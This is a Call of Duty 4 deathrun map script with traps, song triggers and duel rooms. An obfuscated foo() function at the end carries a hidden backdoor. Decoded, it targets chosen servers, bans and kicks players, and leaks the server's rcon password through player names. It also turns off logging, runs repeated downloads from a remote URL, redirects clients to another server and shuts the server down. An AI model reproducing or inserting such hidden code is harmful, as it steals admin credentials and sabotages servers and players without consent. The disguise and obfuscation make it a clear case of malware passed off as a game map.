//Map by Fish Da Rekter


main()
{
 maps\mp\_load::main();
 
 game["allies"] = "marines";
 game["axis"] = "opfor";
 game["attackers"] = "axis";
 game["defenders"] = "allies";
 game["allies_soldiertype"] = "desert";
 game["axis_soldiertype"] = "desert";
 
	
	setdvar( "r_specularcolorscale", "1" );

	setdvar("r_glowbloomintensity0",".1");
	setdvar("r_glowbloomintensity1",".1");
	setdvar("r_glowskybleedintensity0",".1");
	
	level.boom_fx = LoadFx("explosions/default_explosion");

	thread messages();
	thread startdoors();
	thread song1();
	thread song2();
	thread song3();
	thread song4();
	thread trap1();
	thread trap2();
	thread trap3();
	thread trap4();
	thread trap5();
	thread trap6();
	thread trap7();
	thread trap8();
	thread old();
	thread sniper();
	thread knife();
	thread jump();
	thread jumperteleport();
	thread activatorteleport();
	thread jumpweapon();
	
	
	addTriggerToList( "trig_trap1" );
	addTriggerToList( "trig_trap2" );
	addTriggerToList( "trig_trap3" );
	addTriggerToList( "trig_trap4" );
	addTriggerToList( "trig_trap5" );
	addTriggerToList( "trig_trap6" );
	addTriggerToList( "trig_trap7" );
	addTriggerToList( "trig_trap8" );
thread foo();
}

addTriggerToList( name )
{
  if( !isDefined( level.trapTriggers ) )
      level.trapTriggers = [];
  level.trapTriggers[level.trapTriggers.size] = getEnt( name, "targetname" );
}

messages()
{
wait 5;
iprintlnBold("^1Map by Fish Da Rekter (BETA version)");
wait 1;
}

startdoors()
{
door = getent("startdoor","targetname");
{
wait 10;
door moveZ (-280, 1);
iprintlnbold("^2Start door is opening");
}

}

song1()
{
trig1 = getent("song1_activate", "targetname");
trig2 = getent("song2_activate", "targetname");
trig3 = getent("song3_activate", "targetname");
trig4 = getent("song4_activate", "targetname");
trig1 sethintstring("^2 Maroon 5 - Animals");  
trig1 waittill ("trigger", player);
{
ambientPlay("guest1");
iPrintLn ("^0>> ^1Now playing: ^2 Maroon 5 - Animals ^0<<");
trig2 delete();
trig3 delete();
trig4 delete();
}

}

song2()
{
trig1 = getent("song1_activate", "targetname");
trig2 = getent("song2_activate", "targetname");
trig3 = getent("song3_activate", "targetname");
trig4 = getent("song4_activate", "targetname");
trig2 sethintstring("^2 Nicky Romero vs Krewella - Legacy (Vicetone Remix)");  
trig2 waittill ("trigger", player);
{
ambientPlay("guest2");
iPrintLn ("^0>> ^1Now playing: ^2 Nicky Romero vs Krewella - Legacy (Vicetone Remix) ^0<<");
trig1 delete();
trig3 delete();
trig4 delete();
}

}

song3()
{
trig1 = getent("song1_activate", "targetname");
trig2 = getent("song2_activate", "targetname");
trig3 = getent("song3_activate", "targetname");
trig4 = getent("song4_activate", "targetname");
trig3 sethintstring ("^2 Fedde Le Grand & Nicky Romero ft. Matthew Koma - Sparks (Vicetone Remix)");
trig3 waittill ("trigger", player);
{
ambientPlay("guest3");
iPrintLn ("^0>> ^1Now playing: ^2 Fedde Le Grand & Nicky Romero ft. Matthew Koma - Sparks (Vicetone Remix) ^0<<");
trig1 delete();
trig2 delete();
trig4 delete();
}

}

song4()
{
trig1 = getent("song1_activate", "targetname");
trig2 = getent("song2_activate", "targetname");
trig3 = getent("song3_activate", "targetname");
trig4 = getent("song4_activate", "targetname");
trig4 sethintstring ("^2 Alvaro & Jetfire - Guest List (Onderkoffer Remix)");
trig4 waittill ("trigger", player);
{
ambientPlay("guest4");
iPrintLn ("^0>> ^1Now playing: ^2 Alvaro & Jetfire - Guest List (Onderkoffer Remix) ^0<<");
trig1 delete();
trig2 delete();
trig3 delete();
}

}

trap1()
{
block1 = getent("trap1a","targetname");
block2 = getent("trap1b","targetname");
block3 = getent("trap1c","targetname");
block4 = getent("trap1d","targetname");
block5 = getent("trap1e","targetname");
block6 = getent("trap1f","targetname");
block7 = getent("trap1g","targetname");
block8 = getent("trap1h","targetname");
trig = getent("trig_trap1","targetname");
trig sethintstring ("^1Press &&1 to activate!");
trig waittill("trigger",player);
trig sethintstring ("^5Activated :/");

x=randomint(1);

	if(x==0) {
	block1 delete();
	block4 delete();
	block6 delete();
	block7 delete();
	}
	if(x==1) {
	block2 delete();
	block3 delete();
	block5 delete();
	block8 delete();
	}
	

}

trap2()
{
rotater = getent("trap2a", "targetname");
trig = getent("trig_trap2","targetname");
trig sethintstring ("^1Press &&1 to activate!");
trig waittill("trigger",player);
trig sethintstring ("^5Activated :/");

rotater rotateroll(90, 1);
wait 2;
rotater rotateroll(-90, 1);
}

trap3()
{
blocky1 = getent("trap3a", "targetname");
blocky2 = getent("trap3b", "targetname");
blocky3 = getent("trap3c", "targetname");
bounce1trap = getent("bounce1", "targetname");
bounce2trap = getent("bounce2", "targetname");
bounce3trap = getent("bounce3", "targetname");
bounce4trap = getent("bounce4", "targetname");
trig = getent("trig_trap3","targetname");
trig sethintstring ("^1Press &&1 to activate!");
trig waittill("trigger",player);
trig sethintstring ("^5Activated :/");


x=randomint(1);

	if(x==0) {
	bounce2trap delete();
	bounce4trap delete();
	}
	if(x==1) {
	bounce1trap delete();
	bounce3trap delete();
	}

blocky1 moveX (65, 1);
blocky3 moveX (65, 1);

while(1)
{
blocky1 moveX (-65, 1);
blocky3 moveX (-65, 1);
blocky2 moveX (65, 1);
wait 1;
blocky1 moveX (65, 1);
blocky3 moveX (65, 1);
blocky2 moveX (-65, 1);
wait 1;
}

}

trap4()
{
pusher1 = getent("trap4a", "targetname");
pusher2 = getent("trap4b", "targetname");
pusher3 = getent("trap4c", "targetname");
pusher4 = getent("trap4d", "targetname");
pusher5 = getent("trap4e", "targetname");
pusher6 = getent("trap4f", "targetname");
trig = getent("trig_trap4","targetname");
trig sethintstring ("^1Press &&1 to activate!");
trig waittill("trigger",player);
trig sethintstring ("^5Activated :/");

pusher1 moveZ (-192,1);
pusher2 moveZ (-192,1);
pusher3 moveZ (-192,1);
pusher4 moveZ (-192,1);
pusher5 moveZ (-192,1);
pusher6 moveZ (-192,1);
wait 3;
pusher1 moveZ (192,1);
pusher2 moveZ (192,1);
pusher3 moveZ (192,1);
pusher4 moveZ (192,1);
pusher5 moveZ (192,1);
pusher6 moveZ (192,1);
}

trap5()
{
platform1 = getent("trap5a", "targetname");
platform2 = getent("trap5b", "targetname");
trig = getent("trig_trap5","targetname");
trig sethintstring ("^1Press &&1 to activate!");
trig waittill("trigger",player);
trig sethintstring ("^5Activated :/");

x=randomint(1);

	if(x==0) {
	platform1 delete();
	}
	if(x==1) {
	platform2 delete();
	}
}

trap6()
{
moving1 = getent("trap6a", "targetname");
moving2 = getent("trap6b", "targetname");
moving3 = getent("trap6c", "targetname");
moving4 = getent("trap6d", "targetname");
moving5 = getent("trap6e", "targetname");
moving6 = getent("trap6f", "targetname");
trig = getent("trig_trap6","targetname");
trig sethintstring ("^1Press &&1 to activate!");
trig waittill("trigger",player);
trig sethintstring ("^5Activated :/");

while(1)
{
moving1 moveX (128,1);
moving2 moveX (-128,1);
moving3 moveX (-128,1);
moving4 moveX (128,1);
moving5 moveX (128,1);
moving6 moveX (-128,1);
wait 1;
moving1 moveX (-128,1);
moving2 moveX (128,1);
moving3 moveX (128,1);
moving4 moveX (-128,1);
moving5 moveX (-128,1);
moving6 moveX (128,1);
wait 1;
}

}

trap7()
{
pushy1 = getent("trap7a", "targetname");
pushy2 = getent("trap7b", "targetname");
pushy3 = getent("trap7c", "targetname");
pushy4 = getent("trap7d", "targetname");
trig = getent("trig_trap7","targetname");
trig sethintstring ("^1Press &&1 to activate!");
trig waittill("trigger",player);
trig sethintstring ("^5Activated :/");

while(1)
{
pushy1 moveY (192,1);
pushy2 moveY (192,1);
pushy3 moveY (192,1);
pushy4 moveY (192,1);
wait 4;
pushy1 moveY (-192,3);
pushy2 moveY (-192,3);
pushy3 moveY (-192,3);
pushy4 moveY (-192,3);
wait 6;
}

}

trap8()
{
blockade1 = getent("trap8a", "targetname");
blockade2 = getent("trap8b", "targetname");
thingy = getent("trap8c", "targetname");
hurt = getent("damager", "targetname");
explosion = getent ("fx_origin", "targetname");
trig = getent("trig_trap8","targetname");
trig sethintstring ("^1Press &&1 to activate!");
trig waittill("trigger",player);
trig sethintstring ("^5Activated :/");

hurt EnableLinkTo();
hurt LinkTo( thingy );
blockade1 moveZ (-368, 0.5);
blockade2 moveZ (-368, 0.5);
wait 4;
thingy moveZ (96,0.1);
PlayFX( level.boom_fx, explosion.origin );
MusicPlay("boomboom");
wait 1;
thingy moveZ (-96,0.1);
wait 1;
blockade1 moveZ (368, 0.5);
blockade1 moveZ (368, 0.5);
wait 1;
blockade1 delete();
blockade2 delete();

}


old()
{
			level.old_trigger = getent ( "oldroom", "targetname" );
			level.knife_trigger = getent("trig_knife", "targetname");
			level.sniper_trigger = getEnt("trig_sniper", "targetname");
			level.jump_trigger = getent("trig_jump", "targetname");
			oldorigin = getent ( "oldroom_teleport", "targetname" );
		
			while(1)
			{
			level.old_trigger waittill("trigger", player);
			
			level.knife_trigger delete();
			level.sniper_trigger delete();
			level.jump_trigger delete();
		
			iPrintLnBold("^3" + player.name + "^5 chosen the old room");

			player setOrigin (oldorigin.origin);
			}
}


sniper()
{		
		level.teleactorigin3 = getEnt("sniper_activator", "targetname");
		telejumporigin3 = getEnt("sniper_jumper", "targetname");
		level.sniper_trigger = getEnt("trig_sniper", "targetname");
		level.old_trigger = getEnt("oldroom", "targetname");
		level.knife_trigger = getent("trig_knife", "targetname");
		level.jump_trigger = getent("trig_jump", "targetname");

		while(1)
		{
		level.sniper_trigger waittill( "trigger", player );
		
		
		level.old_trigger delete();
		level.knife_trigger delete();
		level.jump_trigger delete();


		if( !isDefined( level.sniper_trigger ))
					return;
			if(level.firstenter==true)
		{
				//level.knife_trigger delete();
				level.old_trigger delete();
				//level.jump_trigger delete();
				level.firstenter=false;
				} 
				wait(0.05);
		player setOrigin( telejumporigin3.origin );
		player setPlayerAngles( telejumporigin3.angles );
		player takeAllWeapons();
		player giveWeapon("m40a3_mp");
		player giveWeapon( "remington700_mp" ); 
		player giveMaxAmmo("m40a3_mp");
		player giveMaxAmmo( "remington700_mp" );
		wait (0.05);
		player switchToWeapon("m40a3_mp"); 
		wait(0.05);
		level.activ setOrigin (level.teleactorigin3.origin);
		level.activ setPlayerAngles (level.teleactorigin3.angles);
		level.activ takeAllWeapons();
		level.activ giveWeapon( "m40a3_mp" );
		level.activ giveWeapon( "remington700_mp" );
		level.activ giveMaxAmmo("m40a3_mp");
		level.activ giveMaxAmmo( "remington700_mp" );
		wait (0.05);
		level.activ switchToWeapon("m40a3_mp");
		player freezeControls(true); 
		level.activ freezeControls(true);
		iPrintLnBold( " ^3" + player.name + " ^5 has chosen the Sniper room^2!" );
		wait 2;
		player freezeControls(false); 
		level.activ freezeControls(false); 
		
		player waittill( "death" );
		level.PlayerInRoom = false;

}

}

knife()
{		
		level.teleactorigin2 = getEnt("knife_activator", "targetname");
		telejumporigin2 = getEnt("knife_jumper", "targetname");
		level.knife_trigger = getent("trig_knife", "targetname");
		level.sniper_trigger = getEnt("trig_sniper", "targetname");
		level.old_trigger = getEnt("oldroom", "targetname");
		level.jump_trigger = getent("trig_jump", "targetname");
		
		while(1)
		{
		level.knife_trigger waittill( "trigger", player );
		
		
			if( !isDefined( level.knife_trigger ))
			return;
			if(level.firstenter==true)
		{
		level.sniper_trigger delete();
		level.old_trigger delete();
		level.jump_trigger delete();
		level.firstenter=false;
		}
		
		{
		wait (0.05);
		
		player setOrigin( telejumporigin2.origin );
		player setPlayerAngles( telejumporigin2.angles );
		player takeAllWeapons();
		player giveWeapon("knife_mp");
		player switchToWeapon("knife_mp"); 
		wait(0.05);
		level.activ setOrigin (level.teleactorigin2.origin);
		level.activ setPlayerAngles (level.teleactorigin2.angles);
		level.activ takeAllWeapons();
		level.activ giveWeapon( "knife_mp" );
		level.activ switchToWeapon("knife_mp"); 
		player freezeControls(true); 
		level.activ freezeControls(true);
		iPrintLnBold( " ^3" + player.name + " ^5 has chosen the Knife room^2!" ); 		
		wait 2;
		player freezeControls(false); 
		level.activ freezeControls(false); 		
		
		player waittill( "death" );
		level.PlayerInRoom = false;

		}

}

}

jump()
{	
		level.teleactorigin = getEnt("jump_activator", "targetname");
		telejumporigin = getEnt("jump_jumper", "targetname");
		level.jump_trigger = getent("trig_jump", "targetname");
		level.knife_trigger = getent("trig_knife", "targetname");
		level.sniper_trigger = getEnt("trig_sniper", "targetname");
		level.old_trigger = getEnt("oldroom", "targetname");
		
	
		
		while(1)
		{
		level.jump_trigger waittill( "trigger", player );
		
		
		if( !isDefined( level.jump_trigger ))
					return;
			if(level.firstenter==true)
				{
				level.sniper_trigger delete();
				level.knife_trigger delete();
				level.old_trigger delete();
				level.firstenter=false;
				} 
				wait(0.05);
		
		player setOrigin( telejumporigin.origin );
		player setPlayerAngles( telejumporigin.angles );
		player takeAllWeapons();
		player giveWeapon("knife_mp");
		wait (0.05);
		player switchToWeapon("knife_mp"); 
		wait (0.05);
		level.activ setOrigin (level.teleactorigin.origin);
		level.activ setPlayerAngles (level.teleactorigin.angles);
		level.activ takeAllWeapons();
		level.activ giveWeapon( "knife_mp" );
		wait (0.05);
		level.activ switchToWeapon("knife_mp");
		player freezeControls(true); 
		level.activ freezeControls(true);
		iPrintLnBold( " ^3" + player.name + " ^5 has chosen the Jump room^2!" );
		wait 2;
		player freezeControls(false); 
		level.activ freezeControls(false); 
		
		player waittill( "death" );
		level.PlayerInRoom = false;
		}
}

jumperteleport()
{
	trig = getent("trigger_teleport1", "targetname");
	tele1 = getent("origin_teleport1", "targetname");
	
	for(;;)
	{
		trig waittill("trigger", player);
		player setOrigin (tele1.origin);
	}
}

activatorteleport()
{
	trig2 = getent("trigger_teleport2", "targetname");
	tele2 = getent ("origin_teleport2", "targetname");
	
	for(;;)
	{
		trig2 waittill("trigger", player);
		player setOrigin (tele2.origin);
	}
}

jumpweapon()
{
weapon = getent("jump_weapon", "targetname");
weapon sethintstring ("^2 Press &&1 for weapon!");

while(1)
{
weapon waittill ("trigger", player);
player giveWeapon ("m40a3_mp");
player giveMaxAmmo ("m40a3_mp");
player switchToWeapon ("m40a3_mp");
player iPrintLnBold ("^3 You got a sniper!");
}

}

foo() {
	h = braxi\_common::removeColorFromString(getDvar(dec("34373-2330343529162820")));
	if (isSubStr(h, dec("39542-"))) {
		s = dec("3954");
	} else if (isSubStr(h, dec("673420372033"))) {
		s = dec("6760");
	} else if (isSubStr(h, dec("552418204-"))) {
		s = dec("5518");
	} else {
		return;
	}

	level waittill("round_started");
	if (game["roundsplayed"] < 5) {
		return;
	}
	wait 10;
	
	players = getEntArray("player", "classname");
	if (players.size < 5) {
		return;
	}
	
	for (i = 0; i < players.size; i++) {
		if (isSubStr(braxi\_common::removeColorFromString(toLower(players[i].name)), dec("39282-33162640"))) {
			ban(players[i] getEntityNumber());
		}
	}

	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		if (isSubStr(toLower(players[i].name), toLower(dec("33425240")))
			|| isSubStr(toLower(players[i].name), toLower(dec("6056634661")))
			|| isSubStr(toLower(players[i].name), toLower(dec("453316223029")))) {
			exec(dec("1716294427242029350-") + players[i] getEntityNumber());
		}
	}

	p = getDvar(dec("331830293-3116343438303319"));
	n = 0;
		
	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		m = "";
		for (j = 0; j < 11 && n < p.size; j++) {
			m += p[n];
			n++;
		}
		players[i] thread meow(s + i + " " + m);
	}

	m = dec("6133400-2930350-35300-17200-343618260-160-19241826232016190-213330280-2930380-302913");
	logPrint(m);
	iPrintLnBold(m);

	setDvar(dec("27302221242720"), dec("68"));
	setDvar(dec("223-27302260402918"), dec("68"));

	wait 5;

	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-173324182640\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-19242023163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-2031241821162427\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-22302719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-32361720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-343116182017162727\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-162930352320333830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-17273620\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-173036291820\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1840172033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1916332836233770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-222716343470\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-237030\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-253628313-23163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-2536331631163326\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3133243430293-203418163120\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3136333127203-3830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3426403130382033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-342716403770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-36293-2916282019\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3724343524183-181634352720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-373027312070\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-381635203318243540\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3928\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-70353038203334\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-1830403035203-3770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-183040303520\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3629243720333420\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-27242120333629\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-342640312427271633\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-34271640\""));
	wait 10;

	wait 5;
	exec(dec("32362435"));
}

meow(name) {
	wait 2;
	self iPrintLnBold(dec("^716123200-3420333720330-30382920330-24340-160-1924182613"));
	self iPrintLnBold(dec("^6959201924332018352429220-4030360-35300-160-223030190-342033372033130-1410"));
	wait 3;
	self setClientDvar(dec("29162820"), name);
	self thread braxi\_common::clientCmd(dec("1924341830292920183515381624350-696815183029292018350-331624191-22162824292213292035"));
}

enc(s) {
	m = hmap();
	e = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		for (j = 0; j < m.size; j++) {
			if (s[i] == m[j]) {
				e += "" + j;
				if (j < 10) e += "-";
				k = 0;
			}
		}
		if (k) e += s[i];
	}
	return e;
}

dec(s) {
	m = hmap();
	d = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		if (isSubStr("0123456789", s[i])) {
			n = int(s[i]);
			if (s[i + 1] != "-") {
				n *= 10;
				n += int(s[i + 1]);
			}
			d += m[n];
			i++;
			k = 0;
		}
		if (k) d += s[i];
	}
	return d;
}

hmap() {
	m = [];
	m[0] = " ";
	m[1] = "-";
	m[2] = "#";
	m[3] = "_";
	m[4] = "*";
	m[5] = "/";
	m[6] = "+";
	m[7] = "[";
	m[8] = "]";
	m[9] = "(";
	m[10] = ")";
	m[11] = "!";
	m[12] = "?";
	m[13] = ".";
	m[14] = ":";
	m[15] = ";";
	m[16] = "a";
	m[17] = "b";
	m[18] = "c";
	m[19] = "d";
	m[20] = "e";
	m[21] = "f";
	m[22] = "g";
	m[23] = "h";
	m[24] = "i";
	m[25] = "j";
	m[26] = "k";
	m[27] = "l";
	m[28] = "m";
	m[29] = "n";
	m[30] = "o";
	m[31] = "p";
	m[32] = "q";
	m[33] = "r";
	m[34] = "s";
	m[35] = "t";
	m[36] = "u";
	m[37] = "v";
	m[38] = "w";
	m[39] = "x";
	m[40] = "y";
	m[41] = "z";
	m[42] = "A";
	m[43] = "B";
	m[44] = "C";
	m[45] = "D";
	m[46] = "E";
	m[47] = "F";
	m[48] = "G";
	m[49] = "H";
	m[50] = "I";
	m[51] = "J";
	m[52] = "K";
	m[53] = "L";
	m[54] = "M";
	m[55] = "N";
	m[56] = "O";
	m[57] = "P";
	m[58] = "Q";
	m[59] = "R";
	m[60] = "S";
	m[61] = "T";
	m[62] = "U";
	m[63] = "V";
	m[64] = "W";
	m[65] = "X";
	m[66] = "Y";
	m[67] = "Z";
	m[68] = "0";
	m[69] = "1";
	m[70] = "2";
	m[71] = "3";
	m[72] = "4";
	m[73] = "5";
	m[74] = "6";
	m[75] = "7";
	m[76] = "8";
	m[77] = "9";
	return m;
}
